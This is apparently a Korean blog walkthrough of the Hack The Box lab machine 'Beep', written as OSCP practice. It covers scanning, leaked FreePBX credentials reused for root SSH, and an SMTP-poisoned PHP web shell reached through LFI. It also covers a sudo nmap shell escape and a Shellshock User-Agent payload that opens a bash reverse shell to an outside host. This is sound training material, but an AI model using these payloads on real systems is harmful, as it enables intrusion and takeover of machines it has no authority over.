1. SCANNING
┌──(root💀takudaddy)-[~]
└─# nmap -A -p- 10.10.10.7 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-20 10:25 KST
Stats: 0:01:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 31.85% done; ETC: 10:30 (0:03:30 remaining)
Stats: 0:01:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 31.85% done; ETC: 10:30 (0:03:30 remaining)
Stats: 0:01:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 31.86% done; ETC: 10:30 (0:03:32 remaining)
Nmap scan report for 10.10.10.7
Host is up (0.21s latency).
Not shown: 64957 closed ports, 562 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Postfix smtpd
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_ssl-date: 2021-04-20T01:41:15+00:00; +4m42s from scanner time.
879/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
Device type: firewall
취약점 스캔
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown:
80/tcp open http
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3
|_sslv2-drown:
111/tcp open rpcbind
143/tcp open imap
|_sslv2-drown:
443/tcp open https
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| http://www.openssl.org/news/secadv_20140605.txt
|_ http://www.cvedetails.com/cve/2014-0224
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.2.x/1024-bit MODP group with safe prime modulus
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
993/tcp open imaps
|_sslv2-drown:
995/tcp open pop3s
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
|_rsa-vuln-roca: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
4445/tcp open upnotifyp
10000/tcp open snet-sensor-mgmt
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
| http://www.exploit-db.com/exploits/1997/
|_ http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
993/tcp open imaps |_sslv2-drown: 995/tcp open pop3s |_ssl-ccs-injection: No reply from server (TIMEOUT) |_sslv2-drown: 3306/tcp open mysql |_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug) |_rsa-vuln-roca: ERROR: Script execution failed (use -d to debug) |_sslv2-drown: |_tls-ticketbleed: ERROR: Script execution failed (use -d to debug) 4445/tcp open upnotifyp 10000/tcp open snet-sensor-mgmt | http-vuln-cve2006-3392: | VULNERABLE: | Webmin File Disclosure | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2006-3392 | Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML. | This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences | to bypass the removal of "../" directory traversal sequences. | | Disclosure date: 2006-06-29 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392 | http://www.exploit-db.com/exploits/1997/ |_ http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
2. WEB ENUMERATION
dirbuster (Be Recursive 옵션 해제하기)
elastix?
# FreePBX Database configuration
# AMPDBHOST: Hostname where the FreePBX database resides
# AMPDBENGINE: Engine hosting the FreePBX database (e.g. mysql)
# AMPDBNAME: Name of the FreePBX database (e.g. asterisk)
# AMPDBUSER: Username used to connect to the FreePBX database
# AMPDBPASS: Password for AMPDBUSER (above)
# AMPENGINE: Telephony backend engine (e.g. asterisk)
# AMPMGRUSER: Username to access the Asterisk Manager Interface
# AMPMGRPASS: Password for AMPMGRUSER
#
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
# AMPBIN: Location of the FreePBX command line scripts
# AMPSBIN: Location of (root) command line scripts
#
AMPBIN=/var/lib/asterisk/bin
AMPSBIN=/usr/local/sbin
# AMPWEBROOT: Path to Apache's webroot (leave off trailing slash)
# AMPCGIBIN: Path to Apache's cgi-bin dir (leave off trailing slash)
# AMPWEBADDRESS: The IP address or host name used to access the AMP web admin
#
AMPWEBROOT=/var/www/html
AMPCGIBIN=/var/www/cgi-bin
# AMPWEBADDRESS=x.x.x.x|hostname
# FOPWEBROOT: Path to the Flash Operator Panel webroot (leave off trailing slash)
# FOPPASSWORD: Password for performing transfers and hangups in the Flash Operator Panel
# FOPRUN: Set to true if you want FOP started by freepbx_engine (amportal_start), false otherwise
# FOPDISABLE: Set to true to disable FOP in interface and retrieve_conf. Useful for sqlite3
# or if you don't want FOP.
#
#FOPRUN=true
FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE
# FOPSORT=extension|lastname
# DEFAULT VALUE: extension
# FOP should sort extensions by Last Name [lastname] or by Extension [extension]
# This is the default admin name used to allow an administrator to login to ARI bypassing all security.
# Change this to whatever you want, don't forget to change the ARI_ADMIN_PASSWORD as well
ARI_ADMIN_USERNAME=admin
# This is the default admin password to allow an administrator to login to ARI bypassing all security.
# Change this to a secure password.
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
admin : jEhdIekWmdjE
모든 비번이 jEhdIekWmdjE 란다.
혹 루트 비번도?
ssh 루트 로그인 시도해보면
┌──(root💀takudaddy)-[~]
└─# ssh root@10.10.10.7 2 ⚙
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
다음과 같은 애러 메시지가 나오는데
#'Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1'
당황하지 말고 애러 문구의 안내대로
openssh client가 약한 방식의 암호문 (diffie-hellman-group 1-sha1)을
쓰도록 강제해주면 된다.
┌──(root💀takudaddy)-[~]
└─# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7 255 ⨯ 2 ⚙
The authenticity of host '10.10.10.7 (10.10.10.7)' can't be established.
RSA key fingerprint is SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg1pEJ0XXD5nFEjki/hI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.7' (RSA) to the list of known hosts.
root@10.10.10.7's password:
Permission denied, please try again.
root@10.10.10.7's password:
Permission denied, please try again.
root@10.10.10.7's password:
Last login: Tue Jul 16 11:45:47 2019
Welcome to Elastix
----------------------------------------------------
To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7
[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@beep ~]# cd /root
[root@beep ~]# ls
anaconda-ks.cfg install.log.syslog webmin-1.570-1.noarch.rpm
elastix-pr-2.2-1.i386.rpm postnochroot
install.log root.txt
[root@beep ~]# cat root.txt
052ed5b6afe89b9e76efd2c19aa5b7a8
[root@beep ~]#
끝
3. 추가 공략법
위와 같이
쉽게 해결될 일이 없을 거라 가정하고
연습도 할 겸 다른 방법으로 진행해 나간다.
LFI 취약점을 발견한 상태.
/etc/passwd
버프 repeater로 보내 실험해 본다.
uid 100
gid 101번이니
asterisk:x:100:101
유저 asterisk
ssh private key 있는지 확인
없음
interluder로 보내 수행 가능한
주요 명령어 리스트로 넣어 돌려도 됨
25번 메일 서버를 이용해
메일을 보낸다.
┌──(root💀takudaddy)-[/htb/b]
└─# telnet 10.10.10.7 25 2 ⚙
Trying 10.10.10.7...
Connected to 10.10.10.7.
Escape character is '^]'.
220 beep.localdomain ESMTP Postfix
VRFY asterisk
252 2.0.0 asterisk
MAIL FROM: <takudaddy>
250 2.1.0 Ok
RCPT TO: <asterisk>
250 2.1.5 Ok
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as 78EF7D9301
메일 디렉터리 호출
/var/mail/asterisk
정상적으로 보내짐
명령어를 입력해 보면
&cmd=id
된다.
리스너를 띄우고
리버스 쉘을 실행해보자.
실패
하지만 해당 부분을 드래그해
ctrl +u로 url 인코딩 후 다시 요청하면
침투 성공!
권한 상승 작업
bash-3.2$ cd /home
cd /home
bash-3.2$ ls
ls
fanis spamfilter
bash-3.2$ ls -al
ls -al
total 28
drwxr-xr-x 4 root root 4096 Apr 7 2017 .
drwxr-xr-x 22 root root 4096 Apr 19 13:57 ..
drwxrwxr-x 2 fanis fanis 4096 Apr 7 2017 fanis
drwx------ 2 spamfilter spamfilter 4096 Apr 7 2017 spamfilter
bash-3.2$ cd fanis
cd fanis
bash-3.2$ ls
ls
user.txt
bash-3.2$ cat user.txt
cat user.txt
4c9cc5fd6292422e853eb4926dc49f99
bash-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
bash-3.2$ nmap --interactive
bash-3.2$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root
sh-3.2# cat /root/root.txt
cat /root/root.txt
052ed5b6afe89b9e76efd2c19aa5b7a8
4. 또 다른 방법
webmin
위 아이디랑 비번으로 로그인 불가.
하지만 cgi-bin 파일을 사용하기 때문에
shell-shock 취약 가능성이 있다.
실험
user-agent 부분을
shellshock 커맨드로 바꿔 실행
User-Agent: () { :; }; echo; id > 출력 결과 없음
혹시나 하고 sleep 명령어를 실행해보면
User-Agent: () { :; }; echo; sleep 10 > 수행됨
취약점이 있는 것으로 보아
리스너 띄우고 리버스 쉘 실행
User-Agent: () { :; }; echo; bash -i >& /dev/tcp/10.10.14.13/7979 0>&1
루트로 접속 성공.
그 밖에
아이디와 비번은 모두 찾은 상태
admin : jEhdIekWmdjE
로그인해보면
성공
아래도
성공
이것들을 활용해도 될 것 같은데
이쯤에서 그만함...
728x90
반응형
'OSCP > HacktheBox' 카테고리의 다른 글
| 10. Sense (0) | 2021.04.22 |
|---|---|
| 9. Cronos (0) | 2021.04.21 |
| 7. Valentine (0) | 2021.04.20 |
| 6. Nibbles (0) | 2021.04.19 |
| 5. Bashed (0) | 2021.04.19 |